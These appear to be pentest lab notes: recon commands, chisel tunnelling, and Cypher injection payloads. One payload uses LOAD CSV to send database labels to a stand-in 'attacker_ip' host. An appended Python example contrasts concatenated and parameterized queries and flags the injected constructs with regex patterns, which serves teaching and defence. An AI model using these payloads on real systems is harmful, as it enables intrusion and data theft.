Paths of available web services:

/etc/nginx/sites-available/default

Search for users (files owned by the user dev):

find / -user dev

List services listening locally:

ss -ntlp

Expose them to our machine:

chisel

CYPHER:

MATCH (e:employee) WHERE e.name = '' or 1='1' RETURN e

' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip/?l='+label as l RETURN 0 as _0
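
Added example (not part of the original notes): the two Cypher payload shapes above run through a string-concatenated query and its parameterized form, with a check that flags the injected constructs in the resulting query text. The template, function names and rule names are assumptions for illustration, and the check assumes you can read the query text, for instance from a database query log.

```python
import re

# Hypothetical template with the same shape as the MATCH query in the notes.
TEMPLATE = "MATCH (e:employee) WHERE e.name = '{name}' RETURN e"

def build_unsafe(name):
    """Vulnerable: user input is concatenated into the Cypher text."""
    return TEMPLATE.format(name=name)

def build_safe(name):
    """Hardened: input travels as a parameter and never becomes query text."""
    return "MATCH (e:employee) WHERE e.name = $name RETURN e", {"name": name}

# Constructs a plain employee lookup should never contain.
SUSPICIOUS = {
    "load_csv_remote": re.compile(r"\bLOAD\s+CSV\b.*?\bFROM\s+'https?://", re.I | re.S),
    "schema_procedure": re.compile(r"\bCALL\s+db\.\w+\s*\(", re.I),
    "union": re.compile(r"\bUNION\b", re.I),
    "tautology": re.compile(r"\bOR\s+1\s*=\s*'?1", re.I),
}

def findings(query_text):
    """Return the sorted names of suspicious constructs found in a query."""
    return sorted(k for k, rx in SUSPICIOUS.items() if rx.search(query_text))

# Constructed inputs: a benign name and the two payload shapes from the notes.
BENIGN = "alice"
TAUTOLOGY = "' or 1='1"
EXFIL = ("' RETURN 0 as _0 UNION CALL db.labels() yield label "
         "LOAD CSV FROM 'http://attacker_ip/?l='+label as l RETURN 0 as _0")

if __name__ == "__main__":
    for label, value in [("benign", BENIGN), ("tautology", TAUTOLOGY), ("exfil", EXFIL)]:
        unsafe_query = build_unsafe(value)
        safe_query, params = build_safe(value)
        # The unsafe query text changes with the input; the safe one does not.
        print(label, "unsafe:", findings(unsafe_query), "safe:", findings(safe_query))
```

With the parameterized form the payload stays inside the `name` parameter as data, so the query text the database parses is identical for every input.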